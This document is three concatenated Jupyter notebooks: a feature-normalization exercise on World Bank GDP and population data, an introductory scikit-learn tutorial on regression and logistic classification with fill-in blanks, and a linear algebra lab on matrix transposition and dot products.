# In this exercise, you'll practice scaling data. Sometimes, you'll see the terms **standardization** and **normalization** used interchangeably when referring to feature scaling. However, these are slightly different operations. Standardization refers to scaling a set of values so that they have a mean of zero and a standard deviation of one. Normalization refers to scaling a set of values so that the range if between zero and one.
#
# In this exercise, you'll practice implementing standardization and normalization in code. There are libraries, like scikit-learn, that can do this for you; however, in data engineering, you might not always have these tools available.
#
# Run this first cell to read in the World Bank GDP and population data. This code cell also filters the data for 2016 and filters out the aggregated values like 'World' and 'OECD Members'.
# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# read in the projects data set and do basic wrangling
gdp = pd.read_csv('../data/gdp_data.csv', skiprows=4)
gdp.drop(['Unnamed: 62', 'Country Code', 'Indicator Name', 'Indicator Code'], inplace=True, axis=1)
population = pd.read_csv('../data/population_data.csv', skiprows=4)
population.drop(['Unnamed: 62', 'Country Code', 'Indicator Name', 'Indicator Code'], inplace=True, axis=1)
# Reshape the data sets so that they are in long format
gdp_melt = gdp.melt(id_vars=['Country Name'],
var_name='year',
value_name='gdp')
# Use back fill and forward fill to fill in missing gdp values
gdp_melt['gdp'] = gdp_melt.sort_values('year').groupby('Country Name')['gdp'].fillna(method='ffill').fillna(method='bfill')
population_melt = population.melt(id_vars=['Country Name'],
var_name='year',
value_name='population')
# Use back fill and forward fill to fill in missing population values
population_melt['population'] = population_melt.sort_values('year').groupby('Country Name')['population'].fillna(method='ffill').fillna(method='bfill')
# merge the population and gdp data together into one data frame
df_country = gdp_melt.merge(population_melt, on=('Country Name', 'year'))
# filter data for the year 2016
df_2016 = df_country[df_country['year'] == '2016']
# filter out values that are not countries
non_countries = ['World',
'High income',
'OECD members',
'Post-demographic dividend',
'IDA & IBRD total',
'Low & middle income',
'Middle income',
'IBRD only',
'East Asia & Pacific',
'Europe & Central Asia',
'North America',
'Upper middle income',
'Late-demographic dividend',
'European Union',
'East Asia & Pacific (excluding high income)',
'East Asia & Pacific (IDA & IBRD countries)',
'Euro area',
'Early-demographic dividend',
'Lower middle income',
'Latin America & Caribbean',
'Latin America & the Caribbean (IDA & IBRD countries)',
'Latin America & Caribbean (excluding high income)',
'Europe & Central Asia (IDA & IBRD countries)',
'Middle East & North Africa',
'Europe & Central Asia (excluding high income)',
'South Asia (IDA & IBRD)',
'South Asia',
'Arab World',
'IDA total',
'Sub-Saharan Africa',
'Sub-Saharan Africa (IDA & IBRD countries)',
'Sub-Saharan Africa (excluding high income)',
'Middle East & North Africa (excluding high income)',
'Middle East & North Africa (IDA & IBRD countries)',
'Central Europe and the Baltics',
'Pre-demographic dividend',
'IDA only',
'Least developed countries: UN classification',
'IDA blend',
'Fragile and conflict affected situations',
'Heavily indebted poor countries (HIPC)',
'Low income',
'Small states',
'Other small states',
'Not classified',
'Caribbean small states',
'Pacific island small states']
# remove non countries from the data
df_2016 = df_2016[~df_2016['Country Name'].isin(non_countries)]
# show the first ten rows
print('first ten rows of data')
df_2016.head(10)
# -
# # Exercise - Normalize the Data
#
# To normalize data, you take a feature, like gdp, and use the following formula
#
# $x_{normalized} = \frac{x - x_{min}}{x_{max} - x_{min}}$
#
# where
# * x is a value of gdp
# * x_max is the maximum gdp in the data
# * x_min is the minimum GDP in the data
#
# First, write a function that outputs the x_min and x_max values of an array. The inputs are an array of data (like the GDP data). The outputs are the x_min and x_max values
# +
def x_min_max(data):
# TODO: Complete this function called x_min_max()
# The input is an array of data as an input
# The outputs are the minimum and maximum of that array
minimum = data.min()
maximum =data.max()
return minimum, maximum
# this should give the result (36572611.88531479, 18624475000000.0)
x_min_max(df_2016['gdp'])
# -
# Next, write a function that normalizes a data point. The inputs are an x value, a minimum value, and a maximum value. The output is the normalized data point
def normalize(x, x_min, x_max):
# TODO: Complete this function
# The input is a single value
# The output is the normalized value
return (x-x_min)/(x_max-x_min)
# Why are you making these separate functions? Let's say you are training a machine learning model and using normalized GDP as a feature. As new data comes in, you'll want to make predictions using the new GDP data. You'll have to normalize this incoming data. To do that, you need to store the x_min and x_max from the training set. Hence the x_min_max() function gives you the minimum and maximum values, which you can then store in a variable.
#
# A good way to keep track of the minimum and maximum values would be to use a class. In this next section, fill out the Normalizer() class code to make a class that normalizes a data set and stores min and max values.
class Normalizer():
# TODO: Complete the normalizer class
# The normalizer class receives a dataframe as its only input for initialization
# For example, the data frame might contain gdp and population data in two separate columns
# Follow the TODOs in each section
def __init__(self, dataframe):
# TODO: complete the init function.
# Assume the dataframe has an unknown number of columns like [['gdp', 'population']]
# iterate through each column calculating the min and max for each column
# append the results to the params attribute list
# For example, take the gdp column and calculate the minimum and maximum
# Put these results in a list [minimum, maximum]
# Append the list to the params variable
# Then take the population column and do the same
# HINT: You can put your x_min_max() function as part of this class and use it
# HINT: Use a for loop to iterate through the columns of the dataframe
self.params = []
for col in dataframe.columns:
self.params.append(x_min_max(dataframe[col]))
def x_min_max(data):
# TODO: complete the x_min_max method
# HINT: You can use the same function defined earlier in the exercise
minimum = min(data)
maximum =max(data)
return minimum, maximum
def normalize_data(self, x):
# TODO: complete the normalize_data method
# The function receives a data point as an input and then outputs the normalized version
# For example, if an input data point of [gdp, population] were used. Then the output would
# be the normalized version of the [gdp, population] data point
# Put the results in the normalized variable defined below
# Assume that the columns in the dataframe used to initialize an object are in the same
# order as this data point x
# HINT: You cannot use the normalize_data function defined earlier in the exercise.
# You'll need to iterate through the individual values in the x variable. A for loop and the
# Python enumerate method might be useful.
# Use the params attribute where the min and max values are stored
normalized = []
for i,value in enumerate(x):
x_min = self.params[i][0]
x_max = self.params[i][1]
normalized.append((x[i]-x_min)/(x_max-x_min))
return normalized
# Run the code cells below to check your results
gdp_normalizer = Normalizer(df_2016[['gdp', 'population']])
# This cell should output: [(36572611.88531479, 18624475000000.0), (11097.0, 1378665000.0)]
gdp_normalizer.params
# This cell should output [0.7207969507229194, 0.9429407193285986]
gdp_normalizer.normalize_data([13424475000000.0, 1300000000])
# # Conclusion
#
# When normalizing or standardizing features for machine learning, you'll need to store the parameters you used to do the scaling. That way you can scale new data points when making predictions. In this exercise, you stored the minimum and maximum values of a feature. When standardizing data, you would need to store the mean and standard deviation. The standardization formula is:
#
# $x_{standardized} = \frac{x - \overline{x}}{S}$
|
Pipelines/ETLPipelines/15_scaling_exercise/.ipynb_checkpoints/15_scaling_exercise-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# + slideshow={"slide_type": "skip"}
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib notebook
# + [markdown] slideshow={"slide_type": "slide"}
# # Introduction to scikit-learn
#
# ##### Version 0.1
#
# ***
# By <NAME> (Northwestern/CIERA)
#
# 28 Feb 2022
# + [markdown] slideshow={"slide_type": "slide"}
# Broadly speaking, machine-learning methods constitute a diverse collection of data-driven algorithms designed to classify/characterize/analyze sources in multi-dimensional spaces. The topics and studies that fall under the umbrella of machine learning is growing, and there is no good catch-all definition. We cannot cover all possible algorithms.
# + [markdown] slideshow={"slide_type": "slide"}
# Today we will focus on the [`scikit-learn`](https://scikit-learn.org/stable/index.html) python library, which provides a nice interface to build a wide variety of machine learning models. As we will see, `scikit-learn` makes machine learning "easy."
# + [markdown] slideshow={"slide_type": "slide"}
# ## Problem 1) Data with `scikit-learn`
#
# In 4 lines we can build a complex classifier for the famous [iris data set](https://en.wikipedia.org/wiki/Iris_flower_data_set).
#
# from sklearn import datasets
# from sklearn.ensemble import RandomForestClassifier
# iris = datasets.load_iris()
# RFclf = RandomForestClassifier().fit(iris.data, iris.target)
# + [markdown] slideshow={"slide_type": "slide"}
# Those 4 lines of code have constructed a model that is superior to any system of hard cuts that we could have encoded while looking at the multidimensional space.
#
# It's also fast – execute the next cell.
# + slideshow={"slide_type": "slide"}
# execute example code here
from sklearn import datasets
from sklearn.ensemble import RandomForestClassifier
iris = datasets.load_iris()
RFclf = RandomForestClassifier().fit(iris.data, iris.target)
# + [markdown] slideshow={"slide_type": "slide"}
# Generally speaking, the procedure for `scikit-learn` is uniform across all machine-learning algorithms. Models are accessed via the various modules (`ensemble`, `SVM`, `neighbors`, etc), with user-defined tuning parameters. The features (or data) for the models are stored in a 2D array, `X`, with rows representing individual sources and columns representing the corresponding feature values.$^\dagger$ In cases where there is a known classification or scalar value (typically supervised methods), this information is stored in a 1D array `y`.
# + [markdown] slideshow={"slide_type": "subslide"}
# $^\dagger$In a minority of cases, `X`, represents a similarity or distance matrix where each entry represents the distance to every other source in the data set.
# + [markdown] slideshow={"slide_type": "slide"}
# Unsupervised models are fit by calling `.fit(X)` and supervised models are fit by calling `.fit(X, y)`. In both cases, predictions for new observations, `Xnew`, can be obtained by calling `.predict(Xnew)`. Those are the basics and beyond that, the details are algorithm specific, so ...
#
# read the docs!
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1a** What is the pythonic type of `iris`?
# + slideshow={"slide_type": "slide"}
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# You likely haven't encountered a `scikit-learn Bunch` before. It's essentially the same as a dictionary.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1b** What are the keys of iris?
# + slideshow={"slide_type": "slide"}
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# Most importantly, iris contains `data` and `target` values. These are all you need for `scikit-learn`, though the feature and target names and description are useful.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1c** What is the shape and content of the `iris` data?
# + slideshow={"slide_type": "slide"}
print(np.shape(# complete
print(# complete
# + [markdown] slideshow={"slide_type": "slide"}
# The data is a 2d array with shape 150 x 4.
#
# We said earlier that each row represents a source and each column a "feature."
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1d**
#
# What is the first feature in the `iris` data set? What units is it measured in?
# + slideshow={"slide_type": "slide"}
print( # complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1e**
#
# What is the shape and content of the `iris` target?
# + slideshow={"slide_type": "slide"}
print(np.shape( # complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1f**
#
# What are the names of class 0, 1, and 2 in the `iris` target?
# + slideshow={"slide_type": "slide"}
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# An important lesson from this week - worry about the data!
#
# If you are worried about the data, then you should look at the data. This is actually an important aspect of applying machine learning models.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 1g**
#
# Make a scatter plot showing sepal length vs. sepal width for the iris data set. Color the points according to their respective classes.
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.scatter(# complete
# + [markdown] slideshow={"slide_type": "slide"}
# We will return to the `iris` data set later in this notebook.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Problem 2) Linear Regression
# + [markdown] slideshow={"slide_type": "slide"}
# At its core, `scitkit-learn` is designed to help you, the user, easily fit models to data.
#
# To demonstrate this we will start with a familiar example - linear regression.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2a**
#
# Simulate data drawn from a linear relationship with Gaussian scatter.
# + slideshow={"slide_type": "slide"}
np.random.seed(2012)
n_obs = 25
x = np.random.uniform(0,100, n_obs)
y_true = 2.3*x + 14
y_obs = y_true + np.random.normal(0, 15, n_obs)
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2b**
#
# Plot the simulated data. Overplot the true relation from which the data are drawn.
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot(# complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# The [`sklearn.linear_model`](https://scikit-learn.org/stable/modules/classes.html#module-sklearn.linear_model) has a [`LinearRegression`](https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html) class.
#
# The "standard" procedure in `scikit-learn` is to generate the model by creating an instance of the relevant class object (e.g., `reg_model = LinearRegression()`).
#
# The model is then trained using the aforementioned training and label arrays, `X` and `y`, with the `.fit()` method.
#
# Finally, predictions can be made using the `.predict()` method (note - the precise syntax for this can vary depending on the model being used).
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2c**
#
# Generate an instance of the `LinearRegression` class. Call this instance `reg_model`.
# + slideshow={"slide_type": "slide"}
from sklearn.linear_model import LinearRegression
reg_model = # complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2d**
#
# Fit the model to the training data `x` and `y_obs`.
#
# *Hint* - the standard feature array in `scikit-learn` is 2D, so you will need to convert `x` to a 2D array.
# + slideshow={"slide_type": "slide"}
X = # complete
reg_model.fit( # complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2e**
#
# Output the best-fit parameters from the model (these are stored in the `.coef_` and `.intercept_` attributes).
#
# Overplot the best-fit line on top of the observations.
# + slideshow={"slide_type": "slide"}
print(f'The best fit is y = ' # complete
fig, ax = plt.subplots()
ax.plot( # complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 2f**
#
# Fit for the model parameters using some other method (e.g., `numpy`, `scipy`, linear algebra), and compare the model parameters to those found with `scikit-learn`.
# + slideshow={"slide_type": "slide"}
# complete
print('The best-fit model is: y = ' # complete
# + [markdown] slideshow={"slide_type": "slide"}
# The results are identical!
#
# Under the hood, polynomial regression is just linear algebra, so it doesn't matter which library you use to solve the problem. Both `numpy` and `scikit-learn` can handle multi-dimensional input and even account for uncertainties on the observations via input weights. For this problem, it does not matter which library you use.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Problem 3) Linear Classification
# + [markdown] slideshow={"slide_type": "slide"}
# We will now examine why linear regression does not work for classification.
#
# Suppose we have a method to measure the mass of a galaxy (but this method has noise). We would like to separate the galaxies into two classes "normal" and "dwarf", where dwarf galaxies are those with a mass below 60. We could simulate such a dataset as follows.
# + [markdown] slideshow={"slide_type": "subslide"}
# *Note* - this is very much a "toy" data set to be used purely for illustration. While we use some familiar terms, nothing about this is truly physical, which is why we do not include units, etc.
# + slideshow={"slide_type": "slide"}
np.random.seed(1938)
n_obs = 200
mass = np.random.normal(65, 20, size=n_obs)
mass[mass > 70] *= (mass[mass > 70]-60)/60*5
y = (mass > 60).astype(bool)
obs_mass = mass + np.random.normal(0, 7, size=n_obs)
X = obs_mass.reshape(-1,1)
# + [markdown] slideshow={"slide_type": "slide"}
# In the previous cell we have simulated 200 galaxies, most of which are normal with masses > 60. We use this information to define our class vector `y`, such that all normal galaxies have a class of 1 and all dwarf galaxies have a class of 0. Finally, we simulate our observations `X`, which adds Gaussian noise to the true mass measurements.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3a**
#
# Build a classifier using `LinearRegression()`. Find the best fit line for the data. All sources with an extrapolated best-fit value > 0.5 are classified as normal, and everything else is considered a dwarf.
#
# From the training data, how accurate is this model?
# + slideshow={"slide_type": "slide"}
reg_model = # complete
reg_model.fit( # complete
y_pred = # complete
n_incorrect = np.sum((y_pred - y)**2)
accuracy = (n_obs - n_incorrect)/n_obs
print(f'This model has an accuracy of {accuracy:.3f}')
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3b**
#
# To understand the short-comings of this model, plot the data. Overplot the best-fit linear regression model.
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot( # complete
# complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# As we can see in the above plot, every galaxy with $\mathrm{mass} \gtrsim 78$ is classified as normal.
#
# It is also clear from the plot that linear regression is not a particularly good approach to this problem.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3c**
#
# Build a classifier via "hard cut" and assess it's accuracy.
#
# Find the maximum mass for dwarf galaxies in the data set. Classify all sources with a mass less than this as dwarf galaxies.
# + slideshow={"slide_type": "slide"}
mass_cut = # complete
y_pred = # complete
# complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# This represents a slight improvement over the linear regression model. (Note - if you did the reverse and used the normal galaxies to determine the mass cut, you would get similar results)
#
# At this point you must be thinking - "There has to be a better way!"
#
# Fortunately, there is.
# + [markdown] slideshow={"slide_type": "slide"}
# [Logistic Regression](https://en.wikipedia.org/wiki/Logistic_regression) - the "hello, world" of machine learning classification.
# + [markdown] slideshow={"slide_type": "slide"}
# (and also one of the absolutely worst named algorithms ever, as logistic regression is used for *classification* and not *regression*)
# + [markdown] slideshow={"slide_type": "slide"}
# Briefly, logistic regression is used to understand the relationship between a dependent variable (normal vs. dwarf) and one or more independent variables (mass, but could also be mass, star formation rate, metallicity, and so on) by estimating probabilities via the logistic function.
# + [markdown] slideshow={"slide_type": "slide"}
# The logistic function:
#
# $$ p(x) = \frac{1}{1 + e^{-(x - \mu)/s}}$$
#
# can be rewritten as:
#
# $$ p(x) = \frac{1}{1 + e^{-(B_0 + B_1 x)}}$$
#
# which recasts the problem as having a slope and intercept, similar to the linear regression problem that we worked on previously.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3d**
#
# Execute the cell below to see the logistic function.
#
# How might this be useful for our galaxy classification problem?
# + slideshow={"slide_type": "slide"}
x = np.linspace(-10,10,1000)
p_x = 1/(1 + np.exp(-x))
fig, ax = plt.subplots()
ax.plot(x, p_x)
ax.set_xlabel('x', fontsize=14)
ax.set_ylabel('p(x)', fontsize=14)
fig.tight_layout()
# + [markdown] slideshow={"slide_type": "slide"}
# *write your answer here*
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3e**
#
# Create an instance of the [`LogisticRegression`](https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html) class from the `sklearn.linear_model` module.
#
# Fit the model to the simulated galaxy data.
# + slideshow={"slide_type": "slide"}
from sklearn.linear_model import LogisticRegression
logreg = # complete
logreg.fit( # complete
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3f**
#
# Assess the accuracy of the Logistic Regression model.
# + slideshow={"slide_type": "slide"}
y_pred = # complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# This model shows significant improvement over our alternative methods!
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3g**
#
# Overplot the best fit logistic regression model on the data.
#
# *Hint* – the `.intercept_` and `.coef_` attributes can be used to determine the argument for the logistic function.
# + slideshow={"slide_type": "slide"}
fig, ax = plt.subplots()
ax.plot( # complete
# complete
# complete
# complete
# + [markdown] slideshow={"slide_type": "slide"}
# We can see that the logistic regression model is clearly superior to the linear regression model. The model is not perfect, but no model could be in the presence of noise.
#
# We also see that the probability cut ($p \approx 0.5 \;\mathrm{at\;mass} \approx 61.5$) is much closer to the true answer of 60.
# + [markdown] slideshow={"slide_type": "slide"}
# The previous example used a simple toy data set that was easy to visualize. But logistic regression can be extended to include multiple features, and more than two classes (in which case the problem is a multinomial one rather than a binomial one).
#
# This optimization happens entirely under the hood with `scikit-learn`.
# + [markdown] slideshow={"slide_type": "slide"}
# **Problem 3f**
#
# Fit a logistic regression model to the iris data set.
#
# Assess the accuracy of this model.
#
# *Hint* – [`accuracy_score`](https://scikit-learn.org/stable/modules/generated/sklearn.metrics.accuracy_score.html) from `sklearn.metrics` will simplify your calculations.
# + slideshow={"slide_type": "slide"}
from sklearn.metrics import accuracy_score
logreg = LogisticRegression( # complete
# complete
# complete
print('The accuracy of this model is {}' # complete
# + [markdown] slideshow={"slide_type": "slide"}
# In conclustion, today we have learned the basics for the `scikit-learn` library.
#
# We have also learned how the logistic regression algorithm can be very useful for classification problems. Logistic regression is often used as a starting point when building machine learning models: when faced with a new data set, logistic regression can be applied with minimal tuning to get a sense of whether machine learning could be helpful in classifying the data.
# + [markdown] slideshow={"slide_type": "slide"}
# I also want to end with two caveats:
#
# 1. Logistic regression is very powerful, but like all machine learning techniques, it also has limitations. For example, logistic regression can lead to "interpretable" results (such as the mean value where the curve transitions from 0 to 1), but these interpretations will not work if the features are correlated.
#
# 2. The error rates (1 - accuracy) measured throughout this notebook are the "training error." This is not a particularly good way to measure the efficacy of a model as we will discuss in further detail later today.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Challenge Problem
#
# Pick any classification model from the `scikit-learn` library and measure its accuracy when applied to the iris data set.
# + slideshow={"slide_type": "slide"}
|
Sessions/Session14/Day1/IntroToScikitLearn.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/StephanyLera/Linear-Algebra_2nd-Sem/blob/main/Assignment_5.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + id="W1GUAueQJtEc"
#Linear Algebra for ChE
# + [markdown] id="J6Q6_FpmJ_X2"
# ## Laboratory 6 : Matrix Operations
# + [markdown] id="jj20lEyFKDIl"
# Now that you have a fundamental knowledge about representing and operating with vectors as well as the fundamentals of matrices, we'll try to the same operations with matrices and even more.
# + [markdown] id="orDD9mjUKE5V"
# ### Objectives
# At the end of this activity you will be able to:
# 1. Be familiar with the fundamental matrix operations.
# 2. Apply the operations to solve intermediate equations.
# 3. Apply matrix algebra in engineering solutions.
# + [markdown] id="SIPEHXDFKIP-"
# ## Discussion
# + id="k2kWTHIQKJ9V"
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# + [markdown] id="SoaSgVlQKNC9"
# ##Transposition
# + [markdown] id="twBoTcRdKQBe"
# One of the fundamental operations in matrix algebra is Transposition. The transpose of a matrix is done by flipping the values of its elements over its diagonals. With this, the rows and columns from the original matrix will be switched. So for a matrix $A$ its transpose is denoted as $A^T$. So for example:
# + [markdown] id="VgAzNLAtKQp1"
# $$A = \begin{bmatrix} 1 & 2 & 5\\5 & -1 &0 \\ 0 & -3 & 3\end{bmatrix} $$
# + [markdown] id="wdT0QbhqKS02"
# $$ A^T = \begin{bmatrix} 1 & 5 & 0\\2 & -1 &-3 \\ 5 & 0 & 3\end{bmatrix}$$
# + [markdown] id="npicfNOvKbjU"
# This can now be achieved programmatically by using np.transpose() or using the T method
# + colab={"base_uri": "https://localhost:8080/"} id="89-bFujoKcjs" outputId="eced97eb-1288-46ab-88eb-ce6a385e1ef3"
A = np.array([
[1,2,5],
[5,-1,0],
[0,-3,3]
])
A
# + colab={"base_uri": "https://localhost:8080/"} id="qg1HsuIeKeL9" outputId="bf716b49-213f-4eff-ae93-161949d73752"
AT1 = np.transpose(A)
AT1
# + colab={"base_uri": "https://localhost:8080/"} id="8M9q-_N5LQsl" outputId="b99ddf57-c784-46a1-a129-162cbb4148d4"
AT2 = A.T
AT2
# + colab={"base_uri": "https://localhost:8080/"} id="ijZeLNGwKx62" outputId="9889988e-8473-4439-8a46-03575eabf751"
np.array_equiv(AT1, AT2)
# + colab={"base_uri": "https://localhost:8080/"} id="Jiik6j1ZK9TF" outputId="dbf5a2c6-4522-4e1f-ef5f-357b833bd032"
B = np.array([
[2,4,6,8],
[1,2,3,4],
])
B.shape
# + colab={"base_uri": "https://localhost:8080/"} id="SiWIhKyCK93v" outputId="b88ed6cd-359c-4bb5-e733-8f9386809ea4"
np.transpose(B).shape
# + colab={"base_uri": "https://localhost:8080/"} id="ROEKG1TeK-9l" outputId="6c2c72a8-daa1-49b7-e9a9-a22707eaa8a3"
B.T.shape
# + [markdown] id="wenuFb_DLBCJ"
# ####Try to create your own matrix (you can try non-squares) to test transposition.
# + colab={"base_uri": "https://localhost:8080/"} id="jB7qnfZfLDf1" outputId="b89deb14-2251-4837-e9fe-f3b041504dcd"
D=np.array([
[2,4,6,8],
[1,2,3,4]
])
D.shape
# + colab={"base_uri": "https://localhost:8080/"} id="h-k41SIqLVBm" outputId="d24d9028-5aa0-4335-e78d-9b99a756d0c6"
np.transpose(D).shape
# + colab={"base_uri": "https://localhost:8080/"} id="C4V4a2TJLWA-" outputId="69d53d95-f44c-4b81-de3d-89beb4cd5c4c"
D.T.shape
# + colab={"base_uri": "https://localhost:8080/"} id="YEkyM5kVLad-" outputId="d403b274-1efc-4f07-c6ae-e81f486b825c"
DT = D.T
DT
# + [markdown] id="OzwjwrTJLdql"
# ## Dot Product / Inner Product
# + [markdown] id="EolF6mmPLea-"
# If you recall the dot product from laboratory activity before, we will try to implement the same operation with matrices. In matrix dot product we are going to get the sum of products of the vectors by row-column pairs. So if we have two matrices $X$ and $Y$:
#
# $$X = \begin{bmatrix}x_{(0,0)}&x_{(0,1)}\\ x_{(1,0)}&x_{(1,1)}\end{bmatrix}, Y = \begin{bmatrix}y_{(0,0)}&y_{(0,1)}\\ y_{(1,0)}&y_{(1,1)}\end{bmatrix}$$
#
# The dot product will then be computed as:
# $$X \cdot Y= \begin{bmatrix} x_{(0,0)}*y_{(0,0)} + x_{(0,1)}*y_{(1,0)} & x_{(0,0)}*y_{(0,1)} + x_{(0,1)}*y_{(1,1)} \\ x_{(1,0)}*y_{(0,0)} + x_{(1,1)}*y_{(1,0)} & x_{(1,0)}*y_{(0,1)} + x_{(1,1)}*y_{(1,1)}
# \end{bmatrix}$$
#
# So if we assign values to $X$ and $Y$:
# $$X = \begin{bmatrix}1&2\\ 0&1\end{bmatrix}, Y = \begin{bmatrix}-1&0\\ 2&2\end{bmatrix}$$
# + [markdown] id="TJp2f8WnLjaG"
# $$X \cdot Y= \begin{bmatrix} 1*-1 + 2*2 & 1*0 + 2*2 \\ 0*-1 + 1*2 & 0*0 + 1*2 \end{bmatrix} = \begin{bmatrix} 3 & 4 \\2 & 2 \end{bmatrix}$$
# This could be achieved programmatically using `np.dot()`, `np.matmul()` or the `@` operator.
# + id="6-FKUk4kLmBe"
X = np.array([
[5,8],
[1,2]
])
Y = np.array([
[-1,6],
[5,9]
])
# + colab={"base_uri": "https://localhost:8080/"} id="0P1N3akjLn5g" outputId="5aac8044-b5cd-4d93-c59e-8004598f770a"
np.array_equiv(X, Y)
# + colab={"base_uri": "https://localhost:8080/"} id="1RNw6l6kLrqu" outputId="28df0ec9-b8a7-4cef-91aa-23ae9c2b8cd4"
np.dot(X,Y)
# + colab={"base_uri": "https://localhost:8080/"} id="rOiXFO-WLr3q" outputId="e5709fd1-fa9e-4acd-d4c2-1fec58b73c0b"
X.dot(Y)
# + colab={"base_uri": "https://localhost:8080/"} id="6AYUS-s6LpDH" outputId="6d8958ae-f316-4e73-fcf5-a9f57b6624f8"
X @ Y
# + colab={"base_uri": "https://localhost:8080/"} id="Rvbz4ab1Lvt-" outputId="713c6025-b4fd-4af3-fbfc-53f411d2ec5a"
np.matmul(X,Y)
# + id="FmJcTuYqMBDJ"
K = np.array([
[5,7,9],
[1,2,3],
[4,8,12]
])
J = np.array([
[-2,0,5],
[2,-4,6],
[7,4,-3]
])
# + colab={"base_uri": "https://localhost:8080/"} id="jYz51NMkMCt2" outputId="153b0fbf-6112-45f1-dc79-ead65c8131b2"
np.array_equiv(K, J)
# + colab={"base_uri": "https://localhost:8080/"} id="EI5oHO9IMFI5" outputId="46ab5b4e-57d3-4c21-a8d0-0ec28ff7d1c8"
K @ J
# + colab={"base_uri": "https://localhost:8080/"} id="yPddExi9MHZh" outputId="cdff4255-1cc3-4283-dc34-bf4c569a4512"
K.dot(J)
# + colab={"base_uri": "https://localhost:8080/"} id="PEhPPyxRMFOH" outputId="4a57654c-4b96-4a99-e4ef-6f4201c65060"
np.matmul(K, J)
# + colab={"base_uri": "https://localhost:8080/"} id="XrXnwwX7MKP4" outputId="41ba8e30-78ef-44ac-b66a-af2ac10334a0"
np.dot(K, J)
# + [markdown] id="E8_hbXCdMMV-"
# In matrix dot products there are additional rules compared with vector dot products. Since vector dot products were just in one dimension there are less restrictions. Since now we are dealing with Rank 2 vectors we need to consider some rules:
#
# ### Rule 1: The inner dimensions of the two matrices in question must be the same.
#
# So given a matrix $A$ with a shape of $(a,b)$ where $a$ and $b$ are any integers. If we want to do a dot product between $A$ and another matrix $B$, then matrix $B$ should have a shape of $(b,c)$ where $b$ and $c$ are any integers. So for given the following matrices:
#
# $$Z = \begin{bmatrix}2&4&5&5\\5&-2&6&6\\0&1&2&2\end{bmatrix}, O = \begin{bmatrix}1&1\\3&3\\-1&4\end{bmatrix}, E = \begin{bmatrix}0&1&1&3\\1&1&2&5\end{bmatrix}$$
#
# So in this case $A$ has a shape of $(3,2)$, $B$ has a shape of $(3,2)$ and $C$ has a shape of $(2,3)$. So the only matrix pairs that is eligible to perform dot product is matrices $A \cdot C$, or $B \cdot C$.
# + colab={"base_uri": "https://localhost:8080/"} id="lEW30ae0MRqn" outputId="1696995a-7e29-4193-be80-5fb3e0c77e21"
Z = np.array([
[2, 4, 5],
[5, -2, 6],
[0, 1, 2]
])
O = np.array([
[1,1],
[3,3],
[-1,4]
])
E = np.array([
[0,1,1,3],
[1,1,2,5]
])
print(Z.shape)
print(O.shape)
print(E.shape)
# + colab={"base_uri": "https://localhost:8080/"} id="2Qr9SmidMTp5" outputId="9bfbb17a-9837-467d-c20c-6e126abee94b"
O @ E
# + [markdown] id="td8R-fyJMWbI"
# If you would notice the shape of the dot product changed and its shape is not the same as any of the matrices we used. The shape of a dot product is actually derived from the shapes of the matrices used. So recall matrix $A$ with a shape of $(a,b)$ and matrix $B$ with a shape of $(b,c)$, $A \cdot B$ should have a shape $(a,c)$.
# + colab={"base_uri": "https://localhost:8080/"} id="6y_4RqTfMVXP" outputId="be656b87-d8d9-4438-d189-4b8ed352d16f"
X = np.array([
[1,2,3,0]
])
Y = np.array([
[1,0,4,-1]
])
print(X.shape)
print(Y.shape)
# + colab={"base_uri": "https://localhost:8080/"} id="iqVmwLAHMbMC" outputId="169a1845-6135-4d81-8a6b-a8835e8f0ae4"
Y.T @ X
